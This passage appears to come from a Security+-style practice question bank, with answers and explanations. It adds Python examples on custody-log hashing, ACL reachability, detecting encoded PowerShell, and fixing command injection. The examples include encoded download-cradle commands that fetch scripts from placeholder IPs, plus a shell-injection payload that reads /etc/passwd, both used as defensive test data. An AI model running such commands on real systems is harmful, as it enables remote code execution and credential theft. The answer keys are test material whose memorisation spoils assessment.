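def build_sample_log() -> CustodyLog:
    """Constructed handoffs for the laptop in the question; names, times and IDs are made up."""
    log = CustodyLog("EV-2024-017", "SN-7F3A91")
    log.record("2024-03-04T09:12:00Z", "collected", "A. Ortiz", seal="BAG-00421")
    log.record("2024-03-04T09:40:00Z", "handoff", "A. Ortiz", to="K. Lee (transport)", seal="BAG-00421")
    log.record("2024-03-04T11:05:00Z", "checked-in", "K. Lee", to="Evidence locker 3", seal="BAG-00421")
    return log


def tampered_index() -> Optional[int]:
    """Retroactively edit one handoff and show that verification pinpoints it."""
    log = build_sample_log()
    log.entries[1]["to"] = "Unknown courier"
    return log.verify()


if __name__ == "__main__":
    log = build_sample_log()
    print("intact:", log.verify())          # None
    print("tampered at entry:", tampered_index())  # 1
```

Recomputing the edited entry's hash would not help an attacker either: entry 2 was chained to the original hash of entry 1, so the break simply moves one step later. In practice the hashes are published somewhere the custodian cannot quietly rewrite (a ticketing system, a signed email, a printed log sheet), which is the electronic equivalent of the numbered seal on the bag.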

249
MCQeasy

A caller says they are from the help desk and need the employee's MFA code to "complete a password reset". Which social engineering technique is being used?

A.Phishing
B.Pretexting
C.DDoS
D.SQL injection
AnswerB

The caller is inventing a believable story and role to trick the employee into revealing a secret code.

Why this answer

Pretexting is a social engineering technique where an attacker fabricates a scenario (the pretext) to trick a victim into divulging sensitive information. In this case, the attacker pretends to be from the help desk and invokes a false password reset procedure to obtain the employee's MFA code. An MFA code, whether a time-based one-time password (TOTP) or a push approval, exists only to prove the user's own identity; a legitimate help desk never needs it to reset a password, so it should never be shared with anyone, including IT staff.

Exam trap

The trap here is that candidates may confuse pretexting with phishing because both involve deception, but pretexting relies on a fabricated identity and scenario (often via phone or in-person) rather than a malicious electronic message.

How to eliminate wrong answers

Option A is wrong because phishing typically involves sending fraudulent emails or messages that contain malicious links or attachments to steal credentials or install malware, not a direct phone call requesting an MFA code under a false pretext. Option C is wrong because a DDoS (Distributed Denial of Service) attack is a network-level attack that overwhelms a target server with traffic to disrupt services, and it has no relation to social engineering or obtaining an MFA code via impersonation. Option D is wrong because SQL injection is a technical attack that inserts malicious SQL into an application's database queries through unvalidated input; it targets software, not people, and involves no impersonation.

250
MCQmedium

Users on the internal Wi-Fi report that the finance portal suddenly resolves to a different IP address, and the browser shows a fake login page that closely matches the real site. The DNS resolver cache on the network also contains unexpected entries for that host name. What attack is most likely?

A.ARP spoofing, because the attacker is changing the MAC address used on the local network.
B.DNS poisoning, because the attacker has corrupted name resolution so users are sent to a malicious destination.
C.Port scanning, because the attacker is probing internal services for open ports.
D.Denial-of-service, because the attacker is overwhelming the portal with traffic.
AnswerB

DNS poisoning fits the evidence because the resolver cache contains bad entries and users are being directed to a fake site through altered name resolution. That lets the attacker redirect traffic without changing the user’s bookmarks or typing habits.

Why this answer

B is correct because DNS poisoning (also known as DNS cache poisoning) directly corrupts the name resolution process, causing the finance portal's hostname to resolve to a malicious IP address. The presence of unexpected DNS resolver cache entries for that hostname confirms that the attack targeted the DNS infrastructure, not the ARP table or network availability.

Exam trap

The trap here is that candidates confuse ARP spoofing with DNS poisoning because both can redirect traffic, but ARP spoofing operates at Layer 2 and does not affect DNS resolver cache entries, whereas DNS poisoning directly corrupts the name resolution database.

How to eliminate wrong answers

Option A is wrong because ARP spoofing manipulates MAC-to-IP mappings at Layer 2, not DNS cache entries; it would cause traffic interception on the local subnet but would not explain unexpected DNS resolver cache entries. Option C is wrong because port scanning is a reconnaissance technique used to discover open ports and services, not a method to redirect users to a fake login page or corrupt DNS records. Option D is wrong because a denial-of-service attack aims to overwhelm a service with traffic to make it unavailable, not to alter DNS resolution or present a fake login page.

251
Multi-Selectmedium

Which three of the following are core principles of the CIA triad in information security? (Choose three.)

Select 3 answers
A.Confidentiality
B.Integrity
C.Availability
D.Authentication
E.Non-repudiation
F.Authorization
AnswersA, B, C

Why this answer

The CIA triad is the foundational model for information security, consisting of Confidentiality, Integrity, and Availability. Confidentiality ensures data is accessible only to authorized users, often enforced through encryption (e.g., AES-256) and access controls. Integrity guarantees data has not been tampered with, using mechanisms like hashing (SHA-256) or digital signatures.

Availability ensures systems and data are accessible when needed, supported by redundancy (RAID, failover clusters) and DDoS mitigation.

Exam trap

CompTIA often tests the distinction between the CIA triad and other security objectives like AAA (Authentication, Authorization, Accounting) and non-repudiation, leading candidates to mistakenly include Authentication or Authorization as core CIA principles.

252
Multi-Selecthard

A company is redesigning a customer portal. Internet users must reach only the web tier, the web tier must talk to the application tier, and the application tier must talk to the database tier. The security team also wants to reduce lateral movement if one server is compromised. Which three changes best meet these goals? Select three.

Select 3 answers
A.Place the web tier in a DMZ and publish only the reverse proxy or load balancer to the internet.
B.Put the web, application, and database servers in the same flat VLAN so routing is simpler.
C.Place the database tier in a separate internal subnet and allow traffic only from the application tier.
D.Use host-based or microsegmentation rules to restrict east-west traffic between tiers.
E.Give the database tier direct internet access for vendor patching and cloud backups.
AnswersA, C, D

A DMZ keeps the internet-facing systems in a separate trust zone, so the public attack surface is limited to the web layer. If one web server is compromised, the attacker does not automatically gain access to the application or database tiers. Putting only the reverse proxy or load balancer online further reduces exposure and centralizes filtering.

Why this answer

Option A is correct because placing the web tier in a DMZ and publishing only the reverse proxy or load balancer to the internet ensures that external users can only reach the web tier, not the application or database tiers. This aligns with the requirement to restrict internet access to the web tier only, while the reverse proxy or load balancer can inspect and forward traffic, reducing the attack surface. Option C is correct because putting the database tier in its own internal subnet and permitting traffic only from the application tier enforces the required app-to-database path and leaves a compromised web server with no route to the data. Option D is correct because host-based firewall or microsegmentation rules restrict east-west traffic between individual servers, so an attacker who lands on one host cannot freely pivot even to peers in the same tier; this is the control that most directly limits lateral movement after a single compromise.

Exam trap

The trap here is that candidates may think a flat VLAN simplifies routing and is acceptable for security, but CompTIA tests the principle of least privilege and network segmentation, where a flat network fails to prevent lateral movement after a breach.

253
MCQmedium

A vulnerability scan finds two issues: a critical deserialization flaw on a non-production lab server behind a VPN, and a high-severity privilege escalation flaw on the production jump server that administrators use to reach the rest of the environment. Which should be remediated first?

A.The lab server flaw, because critical severity always comes first
B.The jump server flaw, because it affects a production administrative access point
C.Neither issue, because VPN access reduces the need for urgent remediation
D.The lab server flaw, because non-production systems are always easier to patch later
AnswerB

A vulnerable jump server can provide broad access to the environment, so its risk is higher despite the lower severity label.

Why this answer

The jump server flaw must be remediated first because it is a high-severity privilege escalation vulnerability on a production system that administrators use as a gateway to the entire environment. Compromise of this jump server would give an attacker administrative access to all connected production systems, making the business impact far greater than the critical deserialization flaw on an isolated non-production lab server. In risk-based prioritization, severity alone is insufficient; the asset's role, exposure, and potential blast radius must be considered.

Exam trap

The trap here is that candidates fixate on CVSS severity scores (critical vs. high) without considering the asset's context, such as whether it is a production system, its role in the network architecture, and the potential for lateral movement, which CompTIA emphasizes in risk management and prioritization scenarios.

How to eliminate wrong answers

Option A is wrong because it incorrectly assumes that CVSS critical severity always dictates remediation priority, ignoring that the lab server is non-production, reachable only over the VPN, and does not provide a path into production systems. Option C is wrong because VPN access does not eliminate the risk of compromise; an attacker who gains access to the VPN (e.g., via stolen credentials or a client-side exploit) could still reach the jump server, and the jump server's privilege escalation flaw would then allow lateral movement to all production assets. Option D is wrong because it suggests deferring remediation on non-production systems indefinitely; the critical deserialization flaw on the lab server could still be exploited by anyone who reaches it (e.g., via the VPN or an insider), so it should be patched promptly, just not ahead of the higher-impact production jump server flaw.

254
MCQmedium

A data analyst needs a copy of a customer file for product testing. The file includes names, email addresses, purchase history, and government ID numbers, but the test team only needs the names and purchase history. What is the BEST handling action?

A.Provide the full file because the test team is internal and already trusted.
B.Remove or mask the government ID numbers before sharing the minimum necessary fields.
C.Encrypt the file and send it by email to the entire test group.
D.Keep the file unchanged and rely on the team not to open the sensitive columns.
AnswerB

This is the best action because it follows data minimization and privacy principles. The test team does not need government ID numbers, so those fields should be removed or masked before the data is shared. Limiting the dataset to the minimum necessary information reduces privacy risk, lowers the chance of unauthorized disclosure, and aligns with common handling requirements for sensitive customer data.

Why this answer

Option B is correct because it applies the principle of least privilege and data minimization. The test team only needs names and purchase history, so removing or masking the government ID numbers before sharing the minimum necessary fields protects sensitive personally identifiable information (PII) and complies with data protection regulations like GDPR or CCPA. This action reduces the risk of unauthorized exposure of high-risk data while still enabling the test team to perform their work.

Exam trap

The trap here is that candidates may assume internal teams are automatically trusted and fail to apply data minimization, overlooking that even trusted users should only receive the minimum data necessary for their role.

How to eliminate wrong answers

Option A is wrong because internal trust does not justify exposing sensitive government ID numbers to a team that does not need them; this violates the principle of least privilege and could lead to a data breach. Option C is wrong because encrypting the file does not address the core issue of sharing unnecessary sensitive data; the government ID numbers would still be accessible to the entire test group once decrypted, and emailing the file to the entire group increases the risk of interception or accidental forwarding. Option D is wrong because relying on the team not to open sensitive columns is a weak security control; it depends on human behavior and does not prevent accidental or malicious access to the government ID numbers, which should be removed or masked as a technical control.

255
Matchingmedium

A company is redesigning how systems are separated in its office and data center network. Match each network design element to the scenario it best supports. Use each term once.

Descriptions to match:

A subnet that hosts public-facing web servers while keeping them separated from the internal LAN.

Separating finance and engineering workstations on the same switches into different broadcast domains.

A rule set that allows only TCP 8443 from the web tier to the application tier and denies everything else.

Restricting east-west traffic between individual workloads inside the same data center or cloud cluster.

Grouping systems that share similar security requirements and access assumptions for policy design.

Why these pairings

The descriptions map, in order, to a screened subnet (DMZ), a VLAN, an access control list, microsegmentation, and a security zone. A DMZ places public-facing servers in their own subnet so a compromise there does not land an attacker on the internal LAN. VLANs split one physical switch into separate broadcast domains, so finance and engineering workstations cannot see each other's Layer 2 traffic even though they share hardware. An ACL that permits only TCP 8443 from the web tier to the application tier and ends in a deny is the filtering control between tiers; the final deny matters because most ACLs are evaluated top-down with an implicit deny only if one is present or assumed. Microsegmentation pushes that filtering down to individual workloads so east-west traffic inside a data center or cloud cluster is restricted, not just traffic crossing a subnet boundary. A security zone is the grouping of systems with similar security requirements and trust assumptions that the policy for all of the above is designed around.
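The tiered design in question 252 and the ACL and microsegmentation items above come down to the same thing: an ordered rule list with a default deny, and a way to check what a compromised host can still reach. The following is an added example, not part of the question bank, that encodes the three-tier design as rules, evaluates first-match semantics, and computes the blast radius from each tier for the segmented design, the flat-VLAN distractor, and a mis-ordered rule set. Zone names, the PostgreSQL port 5432 for the database tier, and the per-tier service table are assumptions for illustration.

```python
from dataclasses import dataclass
from typing import Optional


@dataclass(frozen=True)
class Rule:
    src: str             # zone name or "*"
    dst: str
    proto: str           # "tcp", "udp" or "*"
    port: Optional[int]  # None matches any port
    action: str          # "allow" or "deny"


# Three-tier design from the question: only the web tier is published, web -> app on
# TCP 8443, app -> db on TCP 5432 (assumed), and an explicit catch-all deny at the end.
SEGMENTED = [
    Rule("internet", "web", "tcp", 443, "allow"),
    Rule("web", "app", "tcp", 8443, "allow"),
    Rule("app", "db", "tcp", 5432, "allow"),
    Rule("*", "*", "*", None, "deny"),
]

# The flat-VLAN distractor: nothing is enforced between tiers.
FLAT = [Rule("*", "*", "*", None, "allow")]

# Same rules with the catch-all deny moved to the top: first match wins, so this blocks everything.
MISORDERED = [SEGMENTED[-1]] + SEGMENTED[:-1]

# Assumed listening service per tier, used to compute reachability.
SERVICES = {"web": ("tcp", 443), "app": ("tcp", 8443), "db": ("tcp", 5432)}


def evaluate(rules, src: str, dst: str, proto: str, port: int) -> str:
    """Return the action of the first matching rule; no match falls through to implicit deny."""
    for r in rules:
        if (r.src in ("*", src) and r.dst in ("*", dst)
                and r.proto in ("*", proto) and r.port in (None, port)):
            return r.action
    return "deny"


def reachable_from(rules, src: str):
    """Blast radius: tiers whose service a host in `src` can open a connection to."""
    return sorted(tier for tier, (proto, port) in SERVICES.items()
                  if tier != src and evaluate(rules, src, tier, proto, port) == "allow")


if __name__ == "__main__":
    for name, rules in (("segmented", SEGMENTED), ("flat", FLAT), ("misordered", MISORDERED)):
        print(name, {z: reachable_from(rules, z) for z in ("internet", "web", "app")})
```

Under SEGMENTED a compromised web server can reach only the application tier on 8443; under FLAT it reaches the database directly, which is the lateral movement the question wants prevented. The MISORDERED set is the practical caveat: an ACL is only as good as its ordering, so a change that inserts a broad rule above the specific allows (or below a catch-all deny) should be tested with exactly this kind of reachability check before it ships.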

256
MCQmedium

Based on the exhibit, which awareness action should the security manager prioritize next?

A.Send the same annual awareness slide deck to everyone again without changing the content.
B.Launch role-based phishing training and reporting reinforcement for the highest-risk groups.
C.Block all external email so users cannot click suspicious messages.
D.Take no action because IT already reports suspicious messages well.
AnswerB

The results show that executives and customer support need the most help, especially because reporting is near zero for executives. Targeted training and practice campaigns are more effective than one-size-fits-all messaging because they address the actual behavior patterns shown in the exhibit.

Why this answer

The exhibit, as summarized above, shows that executives and customer support have the highest click rates and that executives almost never report the messages. Option B is correct because role-based phishing training targets those specific groups with simulated campaigns and reinforcement of the reporting process, which directly reduces the likelihood of a successful social engineering attack where the data shows it is most likely. This aligns with the principle of prioritizing remediation based on risk assessment data rather than blanket training.

Exam trap

The trap here is that candidates may choose Option A (annual slide deck) because they assume any awareness training is sufficient, but the exam emphasizes that targeted, risk-based training is more effective than generic, one-size-fits-all approaches.

How to eliminate wrong answers

Option A is wrong because sending the same annual awareness slide deck without changes fails to address the specific high-risk groups identified in the exhibit, and it does not provide the hands-on, simulated phishing experience needed to change user behavior. Option C is wrong because blocking all external email is an overly restrictive technical control that would break legitimate business communication, and it does not address the root cause of user susceptibility to phishing. Option D is wrong because taking no action ignores the clear risk indicated by the high click rates in certain groups, and relying solely on IT reporting does not reduce the probability of a successful attack from users who click malicious links.

257
MCQmedium

A SOC analyst sees repeated encoded PowerShell launched by mshta.exe. No new executable is written to disk, but the host makes periodic outbound connections to the same IP. Which malware characteristic is most likely?

A.Fileless attack, because the malicious activity lives in memory and uses built-in tools.
B.Worm, because the host is making outbound connections to a remote system.
C.Spyware, because the host is communicating with an external IP address.
D.Rootkit, because the system tools are being hidden from the user.
AnswerA

Fileless attacks commonly abuse legitimate system utilities and leave little or no executable on disk. The use of PowerShell and mshta.exe strongly suggests living-off-the-land behavior designed to evade basic file-based detection.

Why this answer

The scenario describes encoded PowerShell commands executed by mshta.exe without writing a new executable to disk, which is a classic fileless attack technique. Fileless malware keeps its payload out of the file system, running in memory through legitimate tools (here PowerShell and mshta) to evade file-based antivirus; any persistence it needs typically lives in the registry, WMI subscriptions, or scheduled tasks rather than a dropped binary. The periodic outbound connections are command-and-control (C2) beaconing, not self-propagation or data theft.

Exam trap

The trap here is that candidates see 'outbound connections' and immediately think of a worm or spyware, but the key differentiator is the lack of a written executable and the use of built-in tools in memory, which defines a fileless attack.

How to eliminate wrong answers

Option B is wrong because a worm self-propagates across networks without user interaction, but the description only shows outbound connections to a single IP, not scanning or spreading to other hosts. Option C is wrong because spyware specifically steals user data (e.g., keystrokes, files) and typically exfiltrates to a C2 server, but the question focuses on the execution method (memory-resident) and does not indicate data collection. Option D is wrong because a rootkit hides system objects (files, processes, registry keys) from the OS, but the scenario does not mention any concealment of tools or persistence mechanisms; it simply shows a process (mshta.exe) running PowerShell in memory.
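Questions 244 and 257 make the same point from two directions: a durable rule keys on behavior (a script host spawning encoded PowerShell that contains a download cradle) and ignores the hash and IP, which rotate daily. The following is an added example, not part of the question bank, that runs such a rule over constructed Sysmon-style process-creation events. The two attacker events differ only in hash and C2 address and both match; a scripted admin task and a harmless encoded command do not. Field names follow Sysmon Event ID 1 conventions, the parent-process list and cradle keywords are assumptions chosen for illustration, and none of the hashes or addresses are real indicators.

```python
import base64
import re


def _encode_ps(script: str) -> str:
    """-EncodedCommand takes base64 of the UTF-16LE script text."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


PS_EXE = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
CRADLE_A = "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a.ps1')"
CRADLE_B = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.9/b.ps1')"

# Constructed events: 0 and 1 are the same campaign after infrastructure rotation,
# 2 is a benign scheduled script, 3 is encoded PowerShell with no other signal.
EVENTS = [
    {"ParentImage": r"C:\Windows\System32\mshta.exe", "Image": PS_EXE,
     "CommandLine": "powershell.exe -nop -w hidden -enc " + _encode_ps(CRADLE_A),
     "Hashes": "SHA256=1111aaaa", "DestinationIp": "198.51.100.7"},
    {"ParentImage": r"C:\Windows\System32\mshta.exe", "Image": PS_EXE,
     "CommandLine": "powershell.exe -NoP -W Hidden -EncodedCommand " + _encode_ps(CRADLE_B),
     "Hashes": "SHA256=2222bbbb", "DestinationIp": "203.0.113.9"},
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": PS_EXE,
     "CommandLine": r"powershell.exe -File C:\scripts\inventory.ps1",
     "Hashes": "SHA256=3333cccc", "DestinationIp": "10.0.0.5"},
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": PS_EXE,
     "CommandLine": "powershell.exe -enc " + _encode_ps("Get-Date"),
     "Hashes": "SHA256=4444dddd", "DestinationIp": "10.0.0.5"},
]

# Script hosts and Office apps that should rarely be the parent of PowerShell (assumed list)
LOLBIN_PARENTS = {"mshta.exe", "wscript.exe", "cscript.exe", "winword.exe", "excel.exe"}
# Longest alias first so "-enc" is not consumed by the "-e" alternative
ENC_FLAG = re.compile(r"\s-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
CRADLE_MARKERS = ("downloadstring", "downloadfile", "invoke-webrequest", "iex", "invoke-expression")


def decode_encoded_command(cmdline: str):
    """Return the decoded script if the command line carries an encoded command, else None."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def classify(event: dict):
    """Score one event on behaviour alone; Hashes and DestinationIp are never consulted."""
    parent = event["ParentImage"].rsplit("\\", 1)[-1].lower()
    child = event["Image"].rsplit("\\", 1)[-1].lower()
    if child != "powershell.exe":
        return None
    script = decode_encoded_command(event["CommandLine"])
    if script is None:
        return None
    reasons = ["encoded PowerShell"]
    if parent in LOLBIN_PARENTS:
        reasons.append("spawned by " + parent)
    if any(marker in script.lower() for marker in CRADLE_MARKERS):
        reasons.append("download cradle")
    # Two independent behavioural signals are required, which keeps admin noise out
    if len(reasons) < 2:
        return None
    return {"reasons": reasons, "decoded": script}


def hunt(events):
    """Indexes of matching events, whatever hash or IP they carry."""
    return [i for i, e in enumerate(events) if classify(e) is not None]


if __name__ == "__main__":
    for i in hunt(EVENTS):
        print(i, classify(EVENTS[i]))
```

Decoding the command line is what makes the rule durable: the base64 blob changes whenever the URL changes, so matching on the encoded string would be no better than matching on a hash. Matching on the decoded cradle and on the parent process survives the daily rotation described in question 244.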

258
Multi-Selecthard

A report generator accepts a user-supplied report name and then passes it into a shell command to convert a file. During testing, a malicious value causes the server to run an unexpected system command. Which two changes best mitigate this issue while keeping the feature usable? Select two.

Select 2 answers
A.Replace shell command concatenation with a parameterized API or safe library call.
B.Apply strict server-side allowlist validation to the report name before processing.
C.HTML-encode the report name before inserting it into the shell command.
D.Switch the feature from POST to GET so the values are easier to inspect.
E.Hide the server error messages so attackers cannot see the failure details.
AnswersA, B

Avoiding direct shell invocation removes the attacker-controlled command injection path. A safe API or library call passes data as data instead of executable syntax. This is the most effective fix because it eliminates the dangerous pattern rather than trying to filter every possible payload.

Why this answer

Option A is correct because replacing shell command concatenation with a parameterized API or safe library call prevents command injection by ensuring user input is treated as data, not executable code. This is the most effective mitigation because it eliminates the injection vector entirely, rather than trying to sanitize or validate input that may still be passed to a shell interpreter. Option B is correct because a strict server-side allowlist (for example, only letters, digits, hyphen and underscore, with a length limit) rejects shell metacharacters such as ;, |, &, $( ) and backticks at the input boundary and provides defense in depth if a later change reintroduces a shell call. A denylist of known-bad characters is the weaker alternative because it must anticipate every shell, encoding, and quoting trick.

Exam trap

The trap here is that candidates often choose HTML encoding (Option C) thinking it sanitizes all injection types, but HTML encoding only prevents XSS, not command injection, which requires shell-specific escaping or, better, avoiding shell invocation altogether.
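The following is an added example, not part of the question bank, showing the vulnerable pattern from the question beside both fixes in Python. The vulnerable string is tokenized the way a POSIX shell would read it so the injected command is visible; the fixed version validates the name against an allowlist and then executes an argument list with `shell=False`. To keep the example runnable anywhere, the converter binary is replaced by a Python child process that reports the arguments it received; the `convert` name, the file extensions, and the attacker-supplied report name are constructed for illustration.

```python
import json
import re
import shlex
import subprocess
import sys

# Constructed attacker-supplied report name
PAYLOAD = "q1; cat /etc/passwd #"


def vulnerable_command(name: str) -> str:
    """The original pattern: user input concatenated into one shell string.
    Returned rather than executed so the example is safe to run."""
    return f"convert {name}.csv {name}.pdf"


def shell_view(cmd: str):
    """Tokenise the string as /bin/sh would: ';' separates commands and '#' starts
    a comment, so the injected command stands out and the rest is discarded."""
    return list(shlex.shlex(cmd, posix=True, punctuation_chars=True))


# Fix 1: strict server-side allowlist, applied before the name is used anywhere
REPORT_NAME = re.compile(r"[A-Za-z0-9_-]{1,64}")


def validate_report_name(name: str) -> str:
    if not REPORT_NAME.fullmatch(name):
        raise ValueError("report name rejected by allowlist")
    return name


# Fix 2: build an argv list and run it without a shell, so nothing parses the input
def build_argv(name: str):
    return ["convert", f"{name}.csv", f"{name}.pdf"]


def exec_argv_as_data(argv):
    """Stand-in for the converter: a Python child that echoes back its argv as JSON.
    With a list and shell=False each element reaches the child as exactly one
    argument, metacharacters included, and no second command ever runs."""
    probe = [sys.executable, "-c", "import json, sys; print(json.dumps(sys.argv[1:]))"]
    result = subprocess.run(probe + argv[1:], capture_output=True, text=True, check=True)
    return json.loads(result.stdout)


def convert_report(name: str):
    """Both fixes together: allowlist first, then argv execution."""
    return exec_argv_as_data(build_argv(validate_report_name(name)))


def is_rejected(name: str) -> bool:
    """True if the allowlist refuses the name before any command is built."""
    try:
        convert_report(name)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    print(shell_view(vulnerable_command(PAYLOAD)))
    print(exec_argv_as_data(build_argv(PAYLOAD)))
    print(convert_report("q1_2024"))
```

Run on the payload, `shell_view` shows the shell would execute `convert q1` and then `cat /etc/passwd`, with the intended `.csv`/`.pdf` suffixes lost behind the comment marker. The argv form passes the whole payload through as two ordinary filenames, which the converter would simply fail to find, and the allowlist rejects it before that point. This is also why HTML encoding (Option C) cannot help: `&#59;` is still not a valid report name, and a shell does not decode HTML entities.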

259
MCQ · medium

A network engineer needs to change an ACL on a production firewall so a new SaaS integration works. The business cannot tolerate an extended outage, and the change must be reversible if testing fails. Which practice best fits?

A. Make the change directly during business hours without documentation
B. Follow formal change management with approval, testing, and rollback planning
C. Disable logging temporarily so the firewall change applies faster
D. Ask the vendor to modify the firewall remotely without internal review
Answer: B

Change management provides traceability, validation, and a prepared rollback path for production changes.

Why this answer

Formal change management ensures the ACL modification is documented, tested in a staging environment, and includes a rollback plan (e.g., reverting to a saved configuration or applying a 'no' command for the specific ACL entry). This minimizes downtime by allowing controlled implementation and immediate reversal if the SaaS integration fails, aligning with the business's zero-tolerance for extended outages.

Exam trap

The trap here is that candidates may think making changes quickly (Option A) or disabling logging (Option C) is acceptable for a 'simple' ACL change, but the SY0-701 exam emphasizes that any production change must follow formal change management to ensure reversibility and minimize risk.

How to eliminate wrong answers

Option A is wrong because making changes directly during business hours without documentation violates change management principles, risks unplanned outages, and provides no rollback path, which is unacceptable for a production firewall. Option C is wrong because disabling logging does not speed up ACL application—firewall ACLs are processed in hardware or software regardless of logging state; it only hides audit trails, making troubleshooting and rollback harder. Option D is wrong because asking the vendor to modify the firewall remotely without internal review bypasses security controls, violates the principle of least privilege, and could introduce unauthorized changes or misconfigurations that are not reversible by the network engineer.

260
MCQ · medium

Based on the exhibit, which identity architecture change best addresses the repeated password resets and delayed offboarding across the company's SaaS applications?

Exhibit:
- SaaS A uses local user accounts
- SaaS B uses local user accounts
- SaaS C supports SAML and automated provisioning
- Help desk reports 120 password reset tickets per month
- Former employees can remain active in two apps for up to 24 hours after termination

Management wants one sign-in and faster deprovisioning.

A. Implement federated SSO with the enterprise identity provider and automated provisioning for SaaS users.
B. Create one shared account for each application and store the passwords in a vault.
C. Keep local accounts in every SaaS app and reset passwords whenever staff change roles.
D. Put the SaaS apps behind a network firewall and use source IP filtering instead of identity.
Answer: A

This is the best answer because federation centralizes authentication, and automated provisioning improves lifecycle management. Users sign in once through the identity provider, reducing password fatigue and help desk resets. When accounts are created, modified, or removed centrally, access changes can reach supported applications much faster, which helps with offboarding and reduces orphaned access.

Why this answer

Option A is correct because implementing federated SSO with the enterprise identity provider (IdP) centralizes authentication, allowing users to sign in once. Combined with automated provisioning (SCIM), it enables near-instant deprovisioning when an employee is terminated, eliminating the 24-hour delay and reducing password reset tickets by removing the need for local account management.

Exam trap

The trap here is that candidates confuse network-layer controls (firewall, IP filtering) with identity-layer solutions, failing to recognize that only federated SSO with automated provisioning addresses both single sign-in and rapid deprovisioning across SaaS apps.

How to eliminate wrong answers

Option B is wrong because shared accounts violate the principle of least privilege and non-repudiation; password vaults do not solve delayed offboarding or reduce password resets, as shared credentials still require manual rotation and do not integrate with identity lifecycle management. Option C is wrong because keeping local accounts and resetting passwords on role changes does not address the 120 monthly password reset tickets (it perpetuates them) and fails to provide faster deprovisioning, as local accounts remain active until manually disabled. Option D is wrong because network firewall and source IP filtering control access at the network layer, not the identity layer; they cannot enforce per-user authentication, single sign-on, or automated deprovisioning, and former employees could still access apps from allowed IPs.

261
MCQ · medium

A security analyst is investigating a series of alerts from the web application firewall. Users are reporting that when they view a product review page on the company's e-commerce site, their browser automatically redirects to a malicious website. The analyst examines the database and finds that a product review submitted by a user contains a <script> tag that loads a JavaScript file from an external domain. Which type of attack has occurred?

A. Cross-site request forgery (CSRF)
B. Stored cross-site scripting (XSS)
C. SQL injection
D. Reflected cross-site scripting (XSS)
Answer: B

This is correct. The injected script is permanently stored in the database (in the product review) and executes when other users view the page, which is the defining characteristic of stored (persistent) XSS.

Why this answer

The attack is stored cross-site scripting (XSS) because the malicious <script> tag was permanently stored in the product review database. When any user views the product review page, the browser loads and executes the external JavaScript file from the attacker's domain, causing an automatic redirect to a malicious website. This matches the classic stored XSS pattern where payload persists in server-side storage and executes in the victim's browser context.

Exam trap

The trap here is confusing stored XSS with CSRF because both involve user interaction and redirects, but stored XSS is about injecting persistent client-side code, while CSRF forges requests without injecting scripts.

How to eliminate wrong answers

Option A is wrong because cross-site request forgery (CSRF) tricks an authenticated user into performing unintended actions on a trusted site, not injecting client-side scripts that execute in the browser. Option C is wrong because SQL injection targets the database layer by manipulating SQL queries to extract or modify data, not by injecting HTML/JavaScript that executes in the user's browser.

262
MCQ · medium

After restoring a virtual file server from backup, users can browse folders, but an accounting application reports missing recent transactions. What should the administrator do next?

A. Mark the restore complete because the file server is reachable
B. Verify the restore in an isolated test environment and compare application data consistency
C. Immediately run a new full backup over the restored server
D. Disable the accounting application permanently to prevent further inconsistency
Answer: B

This confirms whether the backup is usable and whether application data and transaction state were recovered correctly.

Why this answer

The correct next step is to verify the restore in an isolated test environment and compare application data consistency. Although the file server is reachable and folders appear intact, the accounting application's missing recent transactions indicate that the restored data may be stale or incomplete. Testing in isolation ensures the application's database or transaction logs are consistent with the backup point before returning the server to production, preventing data corruption or loss.

Exam trap

The trap here is that candidates assume file server accessibility equals a successful restore, overlooking the critical distinction between file-level availability and application-level data consistency, which is a common focus in CompTIA SY0-701 Security Operations questions.

How to eliminate wrong answers

Option A is wrong because marking the restore complete based solely on file server reachability ignores application-level data integrity; the accounting application's missing transactions prove the restore is incomplete or inconsistent. Option C is wrong because immediately running a new full backup over the restored server would overwrite the current state without validating data consistency, potentially preserving corruption or missing data in the backup chain. Option D is wrong because disabling the accounting application permanently is an extreme, unnecessary action that does not address the root cause of data inconsistency and disrupts business operations.

263
MCQ · medium

A manufacturer wants partner-company users to access a procurement portal using their own company identities. The manufacturer does not want to create local accounts for each partner user, but it still needs to control what those users can do in the portal. Which approach should be used?

A. Create one shared partner account for each external company and reuse the same password.
B. Use federated identity with role mapping so the portal trusts each partner’s identity provider.
C. Synchronize every partner user into the manufacturer’s directory and require a separate password change.
D. Store partner passwords in the portal database and use password reset emails for access control.
Answer: B

Federation lets external users authenticate with their own identity provider while the manufacturer still controls authorization inside the portal. Role mapping converts trusted identity assertions into specific portal permissions, which avoids local account sprawl and simplifies offboarding at the partner side.

Why this answer

Federated identity with role mapping allows the manufacturer to trust authentication performed by each partner's own identity provider (IdP) using standards like SAML 2.0 or OpenID Connect. This eliminates the need for local accounts while enabling fine-grained access control through roles or attributes passed in the assertion, ensuring partners can only perform authorized actions in the portal.

Exam trap

The trap here is that candidates often confuse federation with synchronization, thinking that syncing user accounts into a local directory is the only way to control access, when in fact federation with role mapping provides both authentication delegation and authorization control without storing external user credentials.

How to eliminate wrong answers

Option A is wrong because a single shared account with a reused password violates the principle of least privilege, provides no audit trail for individual user actions, and creates a massive security risk if the password is compromised. Option C is wrong because synchronizing every partner user into the manufacturer's directory defeats the purpose of avoiding local account management, introduces synchronization latency and complexity, and forces partners to manage yet another set of credentials. Option D is wrong because storing partner passwords in the portal database is a direct violation of secure credential storage best practices (e.g., NIST SP 800-63B), and relying on password reset emails for access control is insecure and unscalable for multiple external organizations.

264
MCQ · easy

Which document should define mandatory settings such as full-disk encryption, a 10-minute screen-lock timeout, and removal of local administrator rights on company laptops?

A. Policy, because it explains the general direction but not the exact settings.
B. Standard, because it defines specific required configurations that must be followed.
C. Procedure, because it lists the steps an end user should take every day.
D. Guideline, because it offers flexible recommendations rather than mandatory rules.
Answer: B

